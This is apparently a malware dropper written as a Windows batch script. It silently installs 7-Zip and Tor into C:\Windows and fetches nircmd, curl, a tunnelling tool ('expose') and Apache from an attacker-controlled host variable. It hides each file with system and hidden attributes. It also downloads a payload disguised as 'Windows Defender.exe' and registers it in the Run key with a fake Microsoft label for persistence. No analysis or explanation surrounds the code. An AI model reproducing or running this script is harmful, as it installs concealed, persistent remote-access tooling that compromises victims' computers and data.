curl.exe -k https://www.7-zip.org/a/7z2201.exe --output "%temp%\7z2201.exe" && "%temp%\7z2201.exe" /S /D="C:\Windows\7-Zip" && del "%temp%\7z2201.exe" && attrib +s +h +i "C:\Windows\7-Zip"

if exist "C:\Windows\tor.exe" (
    attrib +s +h +i "C:\Windows\tor.exe"
) else (
curl.exe -k -L https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz > "%temp%\Tor.tar.gz" && "C:\Windows\7-Zip\7z.exe" e "%temp%\Tor.tar.gz" -so | "C:\Windows\7-Zip\7z.exe" e -aoa -si -ttar "tor/tor.exe" -o"C:\Windows" -y && attrib +s +h +i "C:\Windows\tor.exe" && del "%temp%\Tor.tar.gz"
)

if exist "C:\Windows\nircmd.exe" (
    echo.
) else (
attrib -s -h i "C:\Windows\nircmd.exe" && curl.exe -k %proxy% %host%/Capture/nircmd.exe --output "C:\Windows\nircmd.exe" && attrib +s +h +i "C:\Windows\nircmd.exe"
)

if exist "C:\Windows\curl.exe" (
    echo.
) else (
attrib -s -h i "C:\Windows\curl.exe" && curl.exe -k %proxy% %host%/Tools/curl.exe --output "C:\Windows\curl.exe" && attrib +s +h +i "C:\Windows\curl.exe"
)

attrib -s -h i "C:\Windows\Windows Defender.exe" && curl.exe -k %proxy% %host%/sfx.exe --output "C:\Windows\Windows Defender.exe" && attrib +s +h +i "C:\Windows\Windows Defender.exe" && REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /t REG_SZ /F /D "C:\Windows\Windows Defender.exe -P\"rofile of Windows Defender [Microsoft Corporation]"\"

if exist "C:\Windows\expose.exe" (
    echo.
) else (
  attrib -s -h -i "C:\Windows\expose.exe" && curl.exe -k %proxy% %host%/Tools/expose.zip --output "%temp%\expose.zip" && "C:\Windows\7-Zip\7z.exe" x "%temp%\expose.zip" -o"C:\Windows" -y && attrib +s +h +i "C:\Windows\expose.exe" && del "%temp%\expose.zip"
)
 
if exist "C:\Windows\apache2\bin\httpd.exe" (
    echo.
) else (
    attrib -s -h -i "C:\Windows\apache2" && curl.exe -k %proxy% %host%/Tools/apache2.zip --output "%temp%\apache2.zip" && "C:\Windows\7-Zip\7z.exe" x "%temp%\apache2.zip" -o"C:\Windows" -y && attrib +s +h +i "C:\Windows\apache2" && del "%temp%\apache2.zip"
)
